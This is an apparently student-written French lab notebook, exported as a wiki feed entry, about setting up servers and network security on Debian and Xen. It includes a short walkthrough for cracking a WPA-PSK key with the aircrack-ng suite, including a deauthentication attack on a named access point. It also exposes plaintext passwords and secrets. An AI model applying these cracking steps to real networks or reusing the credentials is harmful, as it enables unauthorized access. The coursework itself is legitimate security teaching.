<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Cduval</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Cduval"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Cduval"/>
		<updated>2026-05-13T18:53:54Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=37062</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=37062"/>
				<updated>2017-01-08T17:46:26Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance6 : Sécurisation &amp;amp; Certification */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1 : Configuration du Bonding=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2 : Installation de la machine virtuelle=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
=Séance3 : Volumes logiques=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5 : DNS=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6 : Sécurisation &amp;amp; Certification=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout faispas.key -out faispas.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
On ajoute les fichiers à notre config :&lt;br /&gt;
&lt;br /&gt;
 cp faispas.crt GandiStandardSSLCA2.pem /etc/ssl/certs/ &lt;br /&gt;
 cp faispas.key /etc/ssl/private/&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:~# c_rehash /etc/ssl/certs &lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
 faispas.crt =&amp;gt; 82591bcd.0&lt;br /&gt;
 faispas.crt =&amp;gt; a73fda57.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
Génération des clefs :&lt;br /&gt;
 &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
On inclut dans les clés dans le fichier de zone.db :&lt;br /&gt;
&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone : &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.faispastomberlasavo.net.signed&lt;br /&gt;
&lt;br /&gt;
On ajoute le DNSSEC à Gandi.&lt;br /&gt;
&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:/etc/bind# dig DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 &lt;br /&gt;
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 ;; global options: +cmd&lt;br /&gt;
 ;; Got answer:&lt;br /&gt;
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 10598&lt;br /&gt;
 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
 &lt;br /&gt;
 ;; OPT PSEUDOSECTION:&lt;br /&gt;
 ; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
 ;; QUESTION SECTION:&lt;br /&gt;
 ;faispastomberlasavo.net.	IN	DNSKEY   &lt;br /&gt;
 &lt;br /&gt;
 ;; ANSWER SECTION:&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	257 3 5 AwEAAa3Js66YHVQrw4q+4IKA71lRK9AXWznEZyoxVCxr0SSYx+TFUXxh VTbjq1H8aYjwUa1UyuFsHUC72wJcTNCo0DNOX6Qcek/Y9O30x8xnXRdB OsNFLhnc5v4b5mLTGLswS3GpBCgP8+xSj4LmZPrLZneVom5Q2xCl40KT b5WdpMXXmPjaPOk24gdr5QYzZxrSIqmbEjp2DPaCZiAqPJ8hvvqPFQ+Q Bq53a5/ra3PfN1uo0B2WzeGN0nsb3QDLAREmuovHxSJjm23Yv7rcU8eb txBuOPkbgyES/ybN0uWvW3hiHipXeMCa+yRywnle2Ea56k6w4bcPNta3 8qeF3KwqszE=&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	256 3 5 AwEAAe+I1C2IYzY323K1HXia8curPC+ZduRAiXpsYMdBRyTQOpxTf0zf ulFh42UOPhRCrYm3CZkOesUjhbS0Z3WVzy6u/RHJDRKiqNUbpnBN8jQf mmhIx8FJU3Kcu5st+T6cRWOEoCQIS6tOM31u5I4NKrhXZamDiV361YTQ nJrJNT//&lt;br /&gt;
 &lt;br /&gt;
 ;; Query time: 0 msec&lt;br /&gt;
 ;; SERVER: 127.0.0.1#53(127.0.0.1)&lt;br /&gt;
 ;; WHEN: Mon Nov 28 17:05:19 CET 2016&lt;br /&gt;
 ;; MSG SIZE  rcvd: 476&lt;br /&gt;
&lt;br /&gt;
==Crack clé WPA/PSK==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il faut passer l'interface réseau en mode &amp;quot;Monitor&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan1&lt;br /&gt;
&lt;br /&gt;
Nous pouvons détecter les hotspots grâce à l'utilitaire airodump-ng&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
Nous voulions trouvé la clé de &amp;quot;cracotte01&amp;quot;, nous avons donc filtré pour le bssid &amp;quot;04:DA:D2:9C:50:50&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w out --bssid 04:DA:D2:9C:50:50 mon0&lt;br /&gt;
 aireplay-ng -0 0 -a 04:DA:D2:9C:50:50&lt;br /&gt;
&lt;br /&gt;
Nous avons créer notre dictionnaire de la façon suivante&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o dico.txt&lt;br /&gt;
&lt;br /&gt;
Que nous avons tester sur une Zabeth par soucis de rapidité&lt;br /&gt;
 &lt;br /&gt;
 aircrack-ng -w dico.txt out-01.cap&lt;br /&gt;
&lt;br /&gt;
Qui nous a donné le résultat suivant&lt;br /&gt;
&lt;br /&gt;
 [[Fichier:Aircrack_screen.png|500px|thumb|center]]&lt;br /&gt;
&lt;br /&gt;
==Travail à Réalisé==&lt;br /&gt;
===6.1 Raid===&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il a fallu créer les disques virtuels avec ''lvcreate'' :&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid1 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid2 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid3 -v&lt;br /&gt;
&lt;br /&gt;
Puis il faut rajouter à la config ''/etc/xen/Frotteman.cfg'' :&lt;br /&gt;
&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid1,xvdd1, w',&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid2,xvdd2, w',&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid3,xvdd3, w',&lt;br /&gt;
&lt;br /&gt;
Une fois ceci fait on redémarre la VM et on installe ''mdadm'' :&lt;br /&gt;
&lt;br /&gt;
 apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
On met à jour les modules du kernel (enfin je crois) :&lt;br /&gt;
&lt;br /&gt;
 apt-get install linux-image.3.16.0-4-amd64&lt;br /&gt;
&lt;br /&gt;
Il ne nous reste plus qu'à créer notre disque RAID5 ''md0'' :&lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
&lt;br /&gt;
Nous installons un système de fichier ''ext4'' dessus:&lt;br /&gt;
&lt;br /&gt;
 mkfs -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant le monter :&lt;br /&gt;
&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour tester nous avons copié en partie le dossier /lib dans /mnt.&lt;br /&gt;
Nous commentons une ligne du fichier /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
 #'phy:/dev/virtual/Frotteman-raid2,xvdd2, x',&lt;br /&gt;
&lt;br /&gt;
Puis nous observons les différents résultats via ''fdisk'' :&lt;br /&gt;
&lt;br /&gt;
 fdisk -l&lt;br /&gt;
&lt;br /&gt;
 Disk /dev/xvdd1: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
 Disk /dev/xvdd3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
 Disk /dev/md0: 2 GiB, 2145386496 bytes, 4190208 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 524288 bytes / 1048576 bytes&lt;br /&gt;
&lt;br /&gt;
On observe l'absence du disque xvdd2 mais nous avons en revanche toutes nos données sur /mnt&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:~# ls /mnt/lib&lt;br /&gt;
 ifupdown			      libipq.so.0.0.0	    startpar&lt;br /&gt;
 init				      libiptc.so.0	    systemd&lt;br /&gt;
 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so  libiptc.so.0.0.0	    terminfo&lt;br /&gt;
 libip4tc.so.0			      libxtables.so.10	    udev&lt;br /&gt;
 libip4tc.so.0.1.0		      libxtables.so.10.0.0  x86_64-linux-gnu&lt;br /&gt;
 libip6tc.so.0			      lsb		    xtables&lt;br /&gt;
 libip6tc.so.0.1.0		      modprobe.d&lt;br /&gt;
 libipq.so.0			      modules&lt;br /&gt;
&lt;br /&gt;
Nous avons même été prévenu via mail par mdadm, c'est bo l'info !!&lt;br /&gt;
&lt;br /&gt;
 From root@faispastomberlasavo.net  Wed Dec  7 17:06:00 2016&lt;br /&gt;
 X-Original-To: root&lt;br /&gt;
 From: mdadm monitoring &amp;lt;root@faispastomberlasavo.net&amp;gt;&lt;br /&gt;
 To: root@faispastomberlasavo.net&lt;br /&gt;
 Subject: DegradedArray event on /dev/md0:Frotteman&lt;br /&gt;
 Date: Wed,  7 Dec 2016 17:05:56 +0100 (CET)&lt;br /&gt;
 &lt;br /&gt;
 This is an automatically generated mail message from mdadm&lt;br /&gt;
 running on Frotteman&lt;br /&gt;
 &lt;br /&gt;
 A DegradedArray event had been detected on md device /dev/md0.&lt;br /&gt;
 &lt;br /&gt;
 Faithfully yours, etc.&lt;br /&gt;
 &lt;br /&gt;
 P.S. The /proc/mdstat file currently contains the following:&lt;br /&gt;
 &lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active (auto-read-only) raid5 xvdd1[0] xvdd3[2]&lt;br /&gt;
       2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
       &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===6.2 Cryptage carte SD===&lt;br /&gt;
Pour crypter les données présente sur un support de stockage nous utiliserons Gparted et CryptSetup&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c eas -h sha256 /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
On rentre notre phrase secrète.&lt;br /&gt;
&lt;br /&gt;
Optionel : On peut afficher l'état du conteneur grâce à la commande :&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksDump /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
On peut désormais ouvrir notre volume appelé &amp;quot;frotteman&amp;quot;, il nous faudra ensuite renseigner la clé secrète :&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksOpen /dev/mmcblk1 frotteman&lt;br /&gt;
&lt;br /&gt;
On peut désormais formater le volume en ext3&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext3 /dev/mapper/frotteman&lt;br /&gt;
&lt;br /&gt;
Et finalement monter/demonter le volume :&lt;br /&gt;
&lt;br /&gt;
 mount /dev/mapper/frotteman /mnt/&lt;br /&gt;
 umount /mnt &lt;br /&gt;
&lt;br /&gt;
Et également fermé le volume chiffré :&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksClose frotteman&lt;br /&gt;
&lt;br /&gt;
===6.6 Securasition Wifi par WPA2-EAP===&lt;br /&gt;
 &lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Puis nous avons eu à configurer nos points d'accès wifi au sein du fichier clients.conf, voici à quoi ressemble la configuration d'un des points :&lt;br /&gt;
&lt;br /&gt;
 client E306{&lt;br /&gt;
         ipaddr = 10.60.1.2&lt;br /&gt;
         secret = password&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne restait plus qu'a créer un utilisateur pour ce serveur d'authentification, pour cela nous avons ajouté la ligne suivante dans le fichier users.&lt;br /&gt;
&lt;br /&gt;
 frotteman Cleartext-Password := &amp;quot;youpi&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Une fois cette configuration réalisée nous avons lancé notre serveur FreeRADIUS.&lt;br /&gt;
Configuration des bornes Wi-Fi&lt;br /&gt;
&lt;br /&gt;
Par la suite nous avons réalisé la configuration des bornes Wi-Fi afin d'avoir notre accès sécurisé avec notre serveur FreeRADIUS. La configuation est réalisée en tapant les commandes suivantes après s'être connecté à la borne via telnet :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 &lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_frotteman group radius_frotteman&lt;br /&gt;
 radius-server host 193.48.57.161 auth-port 1812 acct-port 1813 key password&lt;br /&gt;
 aaa group server radius radius_frotteman&lt;br /&gt;
 server 193.48.57.161 auth-port 1812 acct-port 1813&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 dot11 ssid SSID_FROTTEMAN&lt;br /&gt;
 vlan 2&lt;br /&gt;
 authentication open eap eap_frotteman&lt;br /&gt;
 authentication network-eap eap_frotteman&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 &lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
 encryption vlan 2 mode ciphers aes-ccm tkip&lt;br /&gt;
 ssid SSID_FROTTEMAN &lt;br /&gt;
 &lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0.2&lt;br /&gt;
 encapsulation dot1Q 2&lt;br /&gt;
 no ip route-cache&lt;br /&gt;
 bridge-group 2&lt;br /&gt;
 bridge-group 2 subscriber-loop-control&lt;br /&gt;
 bridge-group 2 spanning-disabled&lt;br /&gt;
 bridge-group 2 block-unknown-source&lt;br /&gt;
 no bridge-group 2 source-learning&lt;br /&gt;
 no bridge-group 2 unicast-flooding  &lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 interface GigabitEthernet0.2&lt;br /&gt;
 encapsulation dot1Q 2&lt;br /&gt;
 bridge-group 2&lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
  &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===6.8.1 DHCP===&lt;br /&gt;
On installe un server DHCP sur l'eeePC :&lt;br /&gt;
&lt;br /&gt;
 apt-get install isc-dhcp-server&lt;br /&gt;
&lt;br /&gt;
On configure le fichier /etc/dhcp/dhcpd.conf :&lt;br /&gt;
&lt;br /&gt;
 option domain-name &amp;quot;faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
 option domain-name-servers 193.48.57.161;&lt;br /&gt;
 &lt;br /&gt;
 subnet 10.60.2.0 netmask 255.255.255.0 {&lt;br /&gt;
       range 10.60.2.50 10.60.2.100;&lt;br /&gt;
       option routers 10.60.6.1;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Il ne nous reste plus qu'a indiqué notre interface réseau dans le fichier /etc/dhcp/isc-dhcp-server&lt;br /&gt;
 &lt;br /&gt;
===6.8.2 PCBx===&lt;br /&gt;
&lt;br /&gt;
On installe asterisk &lt;br /&gt;
 apt-get install asterisk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/asterisk/sip.conf afin de créer 2 utilisateurs 666 &amp;amp; 665:&lt;br /&gt;
&lt;br /&gt;
 [general]&lt;br /&gt;
 hasvoicemail=yes&lt;br /&gt;
 hassip=yes&lt;br /&gt;
 hasiax=yes&lt;br /&gt;
 callwaiting=yes&lt;br /&gt;
 threewaycalling=yes&lt;br /&gt;
 callwaitingcallerid=yes&lt;br /&gt;
 transfer=yes&lt;br /&gt;
 canpark=yes&lt;br /&gt;
 cancallforward=yes&lt;br /&gt;
 callreturn=yes&lt;br /&gt;
 callgroup=1&lt;br /&gt;
 pickupgroup=1&lt;br /&gt;
 nat=yes&lt;br /&gt;
 &lt;br /&gt;
 [666]&lt;br /&gt;
 type=friend&lt;br /&gt;
 host=dynamic&lt;br /&gt;
 dtmfmode=rfc2833&lt;br /&gt;
 disallow=all&lt;br /&gt;
 allow=ulaw&lt;br /&gt;
 fullname=Cduval&lt;br /&gt;
 username=cduval&lt;br /&gt;
 secret=glopglop&lt;br /&gt;
 context=work &lt;br /&gt;
 &lt;br /&gt;
 [665]&lt;br /&gt;
 type=friend&lt;br /&gt;
 host=dynamic&lt;br /&gt;
 dtmfmode=rfc2833&lt;br /&gt;
 disallow=all&lt;br /&gt;
 allow=ulaw&lt;br /&gt;
 fullname=Pfitouss&lt;br /&gt;
 username=pfitouss&lt;br /&gt;
 secret=glopglop&lt;br /&gt;
 context=work &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc constater que le communication est réussi&lt;br /&gt;
 Frotteman*CLI&amp;gt; sip show peers&lt;br /&gt;
 Name/username             Host                                    Dyn Forcerport Comedia    ACL Port     Status      Description                      &lt;br /&gt;
 665/pfitouss              (Unspecified)                            D  Auto (No)  No             0        Unmonitored                                  &lt;br /&gt;
 666/cduval                (Unspecified)                            D  Auto (No)  No             0        Unmonitored                                  &lt;br /&gt;
 2 sip peers [Monitored: 0 online, 0 offline Unmonitored: 0 online, 2 offline]&lt;br /&gt;
     -- Registered SIP '665' at 10.60.2.100:38862&lt;br /&gt;
 [Jan  6 16:10:49] NOTICE[3824]: chan_sip.c:27870 handle_request_subscribe: Received SIP subscribe for peer without mailbox: 665&lt;br /&gt;
     -- Registered SIP '666' at 10.60.2.101:35192&lt;br /&gt;
 [Jan  6 16:12:06] NOTICE[3824]: chan_sip.c:27870 handle_request_subscribe: Received SIP subscribe for peer without mailbox: 666&lt;br /&gt;
